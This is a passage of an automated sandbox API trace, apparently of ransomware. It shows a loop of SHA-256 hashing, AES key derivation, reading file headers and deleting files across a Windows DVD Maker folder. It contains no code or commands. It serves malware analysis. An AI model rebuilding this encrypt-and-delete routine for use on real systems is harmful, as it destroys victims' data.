(hHash=0x284d5a8) returned 1 [0146.262] CryptDestroyKey (hKey=0x284d668) returned 1 [0146.262] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0146.263] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\ResizingPanels\\NavigationUp_ButtonGraphic.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\resizingpanels\\navigationup_buttongraphic.png")) returned 0 [0146.263] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52568) returned 1 [0146.264] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0146.264] CryptHashData (hHash=0x284d528, pbData=0x9d1570, dwDataLen=0x100, dwFlags=0x0) returned 1 [0146.264] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d528, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d668) returned 1 [0146.264] GetFileSize (in: hFile=0x454, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xc09 [0146.264] ReadFile (in: hFile=0x454, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0146.266] CryptDestroyHash (hHash=0x284d528) returned 1 [0146.266] CryptDestroyKey (hKey=0x284d668) returned 1 [0146.266] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0146.268] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\ResizingPanels\\NavigationUp_SelectionSubpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\resizingpanels\\navigationup_selectionsubpicture.png")) returned 0 [0146.268] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52568) returned 1 [0146.268] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0146.268] CryptHashData (hHash=0x284d5a8, pbData=0x9d1570, dwDataLen=0x100, dwFlags=0x0) returned 1 [0146.269] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d5a8, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d668) returned 1 [0146.269] GetFileSize (in: hFile=0x450, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x84ca6 [0146.269] ReadFile (in: hFile=0x450, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0146.345] CryptDestroyHash (hHash=0x284d5a8) returned 1 [0146.345] CryptDestroyKey (hKey=0x284d668) returned 1 [0146.345] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0146.346] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\ResizingPanels\\Panel_Mask.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\resizingpanels\\panel_mask.wmv")) returned 0 [0146.347] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52568) returned 1 [0146.347] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0146.347] CryptHashData (hHash=0x284d528, pbData=0x9d1570, dwDataLen=0x100, dwFlags=0x0) returned 1 [0146.347] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d528, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d668) returned 1 [0146.347] GetFileSize (in: hFile=0x454, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x84702 [0146.347] ReadFile (in: hFile=0x454, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0146.384] CryptDestroyHash (hHash=0x284d528) returned 1 [0146.384] CryptDestroyKey (hKey=0x284d668) returned 1 [0146.384] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0146.386] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\ResizingPanels\\Panel_Mask_PAL.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\resizingpanels\\panel_mask_pal.wmv")) returned 0 [0146.386] CryptAcquireContextW (in: phProv=0x326b25c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326b25c*=0xa52568) returned 1 [0146.387] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326b260 | out: phHash=0x326b260) returned 1 [0146.387] CryptHashData (hHash=0x284d568, pbData=0x9d1458, dwDataLen=0x100, dwFlags=0x0) returned 1 [0146.387] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d568, dwFlags=0x0, phKey=0x326b254 | out: phKey=0x326b254*=0x284d5a8) returned 1 [0146.387] GetFileSize (in: hFile=0x42c, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x13d0 [0146.387] ReadFile (in: hFile=0x42c, lpBuffer=0x326b2d4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326b264, lpOverlapped=0x0 | out: lpBuffer=0x326b2d4*, lpNumberOfBytesRead=0x326b264*=0x80, lpOverlapped=0x0) returned 1 [0146.390] CryptDestroyHash (hHash=0x284d568) returned 1 [0146.390] CryptDestroyKey (hKey=0x284d5a8) returned 1 [0146.390] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0146.391] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\scene_button_style_default_Thumbnail.bmp" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\scene_button_style_default_thumbnail.bmp")) returned 0 [0146.391] CryptAcquireContextW (in: phProv=0x326b25c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326b25c*=0xa52568) returned 1 [0146.392] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326b260 | out: phHash=0x326b260) returned 1 [0146.392] CryptHashData (hHash=0x284d668, pbData=0x9d1458, dwDataLen=0x100, dwFlags=0x0) returned 1 [0146.392] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d668, dwFlags=0x0, phKey=0x326b254 | out: phKey=0x326b254*=0x284d5a8) returned 1 [0146.392] GetFileSize (in: hFile=0x450, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xd86 [0146.392] ReadFile (in: hFile=0x450, lpBuffer=0x326b2d4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326b264, lpOverlapped=0x0 | out: lpBuffer=0x326b2d4*, lpNumberOfBytesRead=0x326b264*=0x80, lpOverlapped=0x0) returned 1 [0146.394] CryptDestroyHash (hHash=0x284d668) returned 1 [0146.394] CryptDestroyKey (hKey=0x284d5a8) returned 1 [0146.394] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0146.395] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\shadowonlyframe_buttongraphic.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\shadowonlyframe_buttongraphic.png")) returned 0 [0146.396] CryptAcquireContextW (in: phProv=0x326b25c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326b25c*=0xa52568) returned 1 [0146.397] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326b260 | out: phHash=0x326b260) returned 1 [0146.397] CryptHashData (hHash=0x284d568, pbData=0x9d1458, dwDataLen=0x100, dwFlags=0x0) returned 1 [0146.397] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d568, dwFlags=0x0, phKey=0x326b254 | out: phKey=0x326b254*=0x284d5a8) returned 1 [0146.397] GetFileSize (in: hFile=0x42c, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xd3e [0146.397] ReadFile (in: hFile=0x42c, lpBuffer=0x326b2d4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326b264, lpOverlapped=0x0 | out: lpBuffer=0x326b2d4*, lpNumberOfBytesRead=0x326b264*=0x80, lpOverlapped=0x0) returned 1 [0146.399] CryptDestroyHash (hHash=0x284d568) returned 1 [0146.399] CryptDestroyKey (hKey=0x284d5a8) returned 1 [0146.399] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0146.400] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\shadowonlyframe_selectionsubpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\shadowonlyframe_selectionsubpicture.png")) returned 0 [0146.400] CryptAcquireContextW (in: phProv=0x326b25c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326b25c*=0xa52568) returned 1 [0146.401] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326b260 | out: phHash=0x326b260) returned 1 [0146.401] CryptHashData (hHash=0x284d668, pbData=0x9d1458, dwDataLen=0x100, dwFlags=0x0) returned 1 [0146.401] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d668, dwFlags=0x0, phKey=0x326b254 | out: phKey=0x326b254*=0x284d5a8) returned 1 [0146.401] GetFileSize (in: hFile=0x450, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xc8e [0146.401] ReadFile (in: hFile=0x450, lpBuffer=0x326b2d4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326b264, lpOverlapped=0x0 | out: lpBuffer=0x326b2d4*, lpNumberOfBytesRead=0x326b264*=0x80, lpOverlapped=0x0) returned 1 [0146.408] CryptDestroyHash (hHash=0x284d668) returned 1 [0146.408] CryptDestroyKey (hKey=0x284d5a8) returned 1 [0146.408] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0146.409] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\shadowonlyframe_videoinset.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\shadowonlyframe_videoinset.png")) returned 0 [0146.411] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0146.411] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0146.412] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0146.412] CryptHashData (hHash=0x284d5a8, pbData=0x9d1570, dwDataLen=0x100, dwFlags=0x0) returned 1 [0146.412] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d5a8, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d668) returned 1 [0146.412] GetFileSize (in: hFile=0x450, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x11da [0146.412] ReadFile (in: hFile=0x450, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0146.414] CryptDestroyHash (hHash=0x284d5a8) returned 1 [0146.414] CryptDestroyKey (hKey=0x284d668) returned 1 [0146.414] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0146.415] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Shatter\\1047x576black.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\shatter\\1047x576black.png")) returned 0 [0146.416] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0146.416] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0146.416] CryptHashData (hHash=0x284d528, pbData=0x9d1570, dwDataLen=0x100, dwFlags=0x0) returned 1 [0146.416] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d528, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d668) returned 1 [0146.416] GetFileSize (in: hFile=0x454, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xb04 [0146.416] ReadFile (in: hFile=0x454, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0146.418] CryptDestroyHash (hHash=0x284d528) returned 1 [0146.418] CryptDestroyKey (hKey=0x284d668) returned 1 [0146.418] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0146.419] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Shatter\\203x8subpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\shatter\\203x8subpicture.png")) returned 0 [0146.420] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0146.420] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0146.420] CryptHashData (hHash=0x284d5a8, pbData=0x9d1570, dwDataLen=0x100, dwFlags=0x0) returned 1 [0146.420] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d5a8, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d668) returned 1 [0146.420] GetFileSize (in: hFile=0x450, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x13e0 [0146.421] ReadFile (in: hFile=0x450, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0146.423] CryptDestroyHash (hHash=0x284d5a8) returned 1 [0146.423] CryptDestroyKey (hKey=0x284d668) returned 1 [0146.423] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0146.425] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Shatter\\NavigationLeft_ButtonGraphic.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\shatter\\navigationleft_buttongraphic.png")) returned 0 [0146.425] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0146.426] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0146.426] CryptHashData (hHash=0x284d528, pbData=0x9d1570, dwDataLen=0x100, dwFlags=0x0) returned 1 [0146.426] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d528, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d668) returned 1 [0146.426] GetFileSize (in: hFile=0x454, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xc3a [0146.426] ReadFile (in: hFile=0x454, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0146.428] CryptDestroyHash (hHash=0x284d528) returned 1 [0146.428] CryptDestroyKey (hKey=0x284d668) returned 1 [0146.428] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0146.429] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Shatter\\NavigationLeft_SelectionSubpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\shatter\\navigationleft_selectionsubpicture.png")) returned 0 [0146.429] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0146.430] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0146.430] CryptHashData (hHash=0x284d5a8, pbData=0x9d1570, dwDataLen=0x100, dwFlags=0x0) returned 1 [0146.430] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d5a8, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d668) returned 1 [0146.430] GetFileSize (in: hFile=0x450, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x13a1 [0146.430] ReadFile (in: hFile=0x450, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0146.433] CryptDestroyHash (hHash=0x284d5a8) returned 1 [0146.433] CryptDestroyKey (hKey=0x284d668) returned 1 [0146.433] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0146.434] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Shatter\\NavigationRight_ButtonGraphic.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\shatter\\navigationright_buttongraphic.png")) returned 0 [0146.434] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0146.435] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0146.435] CryptHashData (hHash=0x284d528, pbData=0x9d1570, dwDataLen=0x100, dwFlags=0x0) returned 1 [0146.435] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d528, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d668) returned 1 [0146.435] GetFileSize (in: hFile=0x454, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xc2e [0146.435] ReadFile (in: hFile=0x454, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0146.437] CryptDestroyHash (hHash=0x284d528) returned 1 [0146.437] CryptDestroyKey (hKey=0x284d668) returned 1 [0146.437] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0146.438] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Shatter\\NavigationRight_SelectionSubpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\shatter\\navigationright_selectionsubpicture.png")) returned 0 [0146.439] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0146.439] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0146.439] CryptHashData (hHash=0x284d5a8, pbData=0x9d1570, dwDataLen=0x100, dwFlags=0x0) returned 1 [0146.439] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d5a8, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d668) returned 1 [0146.439] GetFileSize (in: hFile=0x450, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x135b [0146.439] ReadFile (in: hFile=0x450, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0146.442] CryptDestroyHash (hHash=0x284d5a8) returned 1 [0146.442] CryptDestroyKey (hKey=0x284d668) returned 1 [0146.442] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0146.444] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Shatter\\NavigationUp_ButtonGraphic.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\shatter\\navigationup_buttongraphic.png")) returned 0 [0146.444] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0146.444] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0146.444] CryptHashData (hHash=0x284d528, pbData=0x9d1570, dwDataLen=0x100, dwFlags=0x0) returned 1 [0146.445] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d528, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d668) returned 1 [0146.445] GetFileSize (in: hFile=0x454, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xc09 [0146.445] ReadFile (in: hFile=0x454, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0146.447] CryptDestroyHash (hHash=0x284d528) returned 1 [0146.447] CryptDestroyKey (hKey=0x284d668) returned 1 [0146.447] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0146.448] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Shatter\\NavigationUp_SelectionSubpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\shatter\\navigationup_selectionsubpicture.png")) returned 0 [0146.449] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0146.449] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0146.449] CryptHashData (hHash=0x284d5a8, pbData=0x9d1570, dwDataLen=0x100, dwFlags=0x0) returned 1 [0146.449] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d5a8, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d668) returned 1 [0146.449] GetFileSize (in: hFile=0x450, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x547b [0146.449] ReadFile (in: hFile=0x450, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0146.453] CryptDestroyHash (hHash=0x284d5a8) returned 1 [0146.453] CryptDestroyKey (hKey=0x284d668) returned 1 [0146.453] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0146.454] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Shatter\\shatter.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\shatter\\shatter.png")) returned 0 [0146.455] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0146.455] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52568) returned 1 [0146.456] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0146.456] CryptHashData (hHash=0x284d528, pbData=0x9d1570, dwDataLen=0x100, dwFlags=0x0) returned 1 [0146.456] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d528, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d668) returned 1 [0146.456] GetFileSize (in: hFile=0x454, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x11da [0146.456] ReadFile (in: hFile=0x454, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0146.459] CryptDestroyHash (hHash=0x284d528) returned 1 [0146.459] CryptDestroyKey (hKey=0x284d668) returned 1 [0146.459] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0146.460] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\1047x576black.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\specialoccasion\\1047x576black.png")) returned 0 [0146.461] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52568) returned 1 [0146.461] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0146.461] CryptHashData (hHash=0x284d5a8, pbData=0x9d1570, dwDataLen=0x100, dwFlags=0x0) returned 1 [0146.461] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d5a8, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d668) returned 1 [0146.461] GetFileSize (in: hFile=0x450, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xca59 [0146.462] ReadFile (in: hFile=0x450, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0146.468] CryptDestroyHash (hHash=0x284d5a8) returned 1 [0146.468] CryptDestroyKey (hKey=0x284d668) returned 1 [0146.468] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0146.469] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\mainscroll.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\specialoccasion\\mainscroll.png")) returned 0 [0146.470] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52568) returned 1 [0146.470] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, 